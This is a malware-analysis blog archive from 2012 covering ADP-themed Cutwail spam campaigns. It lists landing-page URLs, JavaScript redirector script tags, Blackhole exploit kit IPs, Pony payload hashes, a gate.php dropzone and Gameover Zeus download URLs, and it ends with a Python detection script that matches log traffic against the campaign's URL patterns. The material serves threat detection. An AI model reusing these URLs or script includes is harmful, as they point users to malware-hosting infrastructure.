Monthly Archives: June 2012

ADP Security Management Update

We analyzed the following malicious URL, which was used in ADP-themed spam on June 28/29, 2012:

hxxp://web.abmes.org.br/EiqyDBxS/index.html

ADP Security Update

The spam sample we analyzed was sent from 95.41.229.91, a known Cutwail spambot.

This malicious page contained 4 JavaScript includes, as shown below:

<script type="text/javascript" src="hxxp://firmowa.malopolska.pl/WVfNMNHn/js.js"></script>
<script type="text/javascript" src="hxxp://egerak.ipislam.edu.my/vp0BYhy2/js.js"></script>
<script type="text/javascript" src="hxxp://humas.poltek-malang.ac.id/w28K6pb6/js.js"></script>

Eventually these malicious JavaScript files redirect the victim to a Blackhole Exploit Kit at 173.255.228.171.

This Blackhole exploit kit was hosting at least 14 different malicious payloads. The detected payloads, identified by MD5 hash, included the following:

  • e6341e75dc5413720cbb03f6836ac39d
  • 1277be3dfecd932a1b4b32b1f0942146
  • 13b08f673c05c81b1f5b3344b23f79a2
  • 53fdca7c26b10de657cb4a4906cf6510
  • 488559808a353430357f4c3db9fb126f
  • 13b08f673c05c81b1f5b3344b23f79a2
  • 48a89c2e1816e2f8ec38071b45c72e6e
  • fe05f07e54adbf2d55946643f9a76f83
  • bee7603e2fb3dcb9dcf1c5589d551cb5
  • 1b1bbf726902beb3b25d11fbdc58720f
  • 017c71a4f156df3300d01ace4e01087a
  • e11534af5bb6a69726524e6851d8136d
  • 017c71a4f156df3300d01ace4e01087a
  • ced5d89b3d27b85e9418a94ef2aac990

All of these binaries appear, upon initial inspection, to be Pony downloaders.
The Pony downloader posts to its dropzone at hxxp://182.23.41.18/pony/gate.php and also downloads 3 identical copies of Gameover Zeus from the following locations:

1. hxxp://ftp.fundwaysofmo.com/pdqPv.exe
2. hxxp://www.artevoz.com.br/9D0JP.exe
3. hxxp://diclebaliksepeti.com/fJoqfYi.exe


ADP Funding Notification – Debit Draft

We've been quiet recently, but we haven't stopped our work. Behind the scenes we've been developing some new tools and techniques that we hope will enable us to track the bad guys more efficiently. We used some of these new tools and techniques in our analysis of a new spam run today that spoofed communications from ADP. We observed spam messages with the subject line "ADP Funding Notification – Debit Draft". The spam sample we analyzed was sent from 78.96.173.243, a known Cutwail spambot.

The link in this message directed victims to junnioreadriano.com.br/MZ0PnMj5/index.html. Note that our bad guys are still using the same /8-random-character/index.html pattern. This page contained the following two malicious JavaScript redirectors:

http://ftp.leocardz.com/BhSFTbq9/js.js
http://www.webondemand.altervista.org/V4uags9T/js.js

These JavaScript redirectors send victims to a Blackhole Exploit Kit at 50.116.38.183. This Blackhole exploit kit was hosting at least 9 different malicious payloads. The detected payloads, identified by MD5 hash, included the following:

ce03b87d1d10e76526883077d3924528
937b44fbb5fec18f53c6de60a801d8ed
13fd74a6dc4f1e8e952ea2bc692ede5e
58859d47ccd39461a52a9455f3b0a8ac
9af1128108aac221fd16ddc213c8147a
48a5cd662c66fcdf3ee96ea2126096c7
a08780b691232573e9895589b7f0b76f
1b1bbf726902beb3b25d11fbdc58720f
ededc8b9d03ded0cb7818dc2ef72ad4c

All of these binaries appear, upon initial inspection, to be Pony downloaders.
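Both runs above share the same structure: an /8-random-character/index.html landing page that pulls in /8-random-character/js.js redirectors, which hand the victim to Blackhole, after which Pony checks in to /pony/gate.php. The script below is an added example (not the blog's own tooling) showing how a defender can turn that observation into a detection: it extracts external script sources from a captured landing page and classifies proxy log URLs against the three path patterns. The log lines and the HTML snippet are constructed for the example; they reuse the hostnames and paths published above, and the helper names (classify_url, scan_log, chain_clients, suspicious_script_srcs) are this example's own.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Path patterns taken from the post: the landing page, the JS redirector,
# and the Pony check-in. Eight alphanumerics between the slashes.
LANDING_RE = re.compile(r"^/[A-Za-z0-9]{8}/index\.html$")
REDIRECTOR_RE = re.compile(r"^/[A-Za-z0-9]{8}/js\.js$")
PONY_GATE_RE = re.compile(r"/pony/gate\.php$")

# Constructed proxy log (example data): "client method url status".
SAMPLE_LOG = """\
10.0.0.5 GET http://web.abmes.org.br/EiqyDBxS/index.html 200
10.0.0.5 GET http://firmowa.malopolska.pl/WVfNMNHn/js.js 200
10.0.0.5 GET http://egerak.ipislam.edu.my/vp0BYhy2/js.js 200
10.0.0.5 GET http://humas.poltek-malang.ac.id/w28K6pb6/js.js 200
10.0.0.5 POST http://182.23.41.18/pony/gate.php 200
10.0.0.7 GET http://example.com/static/js.js 200
10.0.0.7 GET http://example.com/about/index.html 200
"""

# Constructed landing page (example data) modelled on the script tags in the post.
SAMPLE_HTML = """\
<html><head>
<script type="text/javascript" src="/static/jquery.js"></script>
<script type="text/javascript" src="http://ftp.leocardz.com/BhSFTbq9/js.js"></script>
<script type="text/javascript" src="http://www.webondemand.altervista.org/V4uags9T/js.js"></script>
<script type="text/javascript">var x = 1;</script>
</head><body></body></html>
"""


def classify_url(url):
    """Label a URL by the campaign path it matches, or None if it matches none."""
    path = urlparse(url).path
    if LANDING_RE.match(path):
        return "landing"
    if REDIRECTOR_RE.match(path):
        return "redirector"
    if PONY_GATE_RE.search(path):
        return "pony-gate"
    return None


def scan_log(text):
    """Return (client, label, url) for every log line whose URL matches a pattern."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue  # malformed line, skip rather than crash
        client, method, url = parts[0], parts[1], parts[2]
        label = classify_url(url)
        if label is None:
            continue
        # Pony's check-in is a POST; a GET to gate.php is a weaker signal.
        if label == "pony-gate" and method.upper() != "POST":
            label = "pony-gate-get"
        hits.append((client, label, url))
    return hits


def chain_clients(hits):
    """Clients that show landing followed by redirector, the strongest signal."""
    seen = {}
    for client, label, _ in hits:
        seen.setdefault(client, set()).add(label)
    return sorted(c for c, labels in seen.items()
                  if {"landing", "redirector"} <= labels)


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a page."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def suspicious_script_srcs(html):
    """Return the script sources in a page that match the redirector pattern."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    return [s for s in parser.srcs if classify_url(s) == "redirector"]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
    print("full chain seen on:", chain_clients(scan_log(SAMPLE_LOG)))
    print("redirectors in page:", suspicious_script_srcs(SAMPLE_HTML))
```

The path regexes are deliberately narrow (exactly eight alphanumerics, exact file names) so that ordinary /static/js.js or /about/index.html traffic does not fire; the landing-then-redirector correlation in chain_clients is what separates a real infection chain from a single coincidental match.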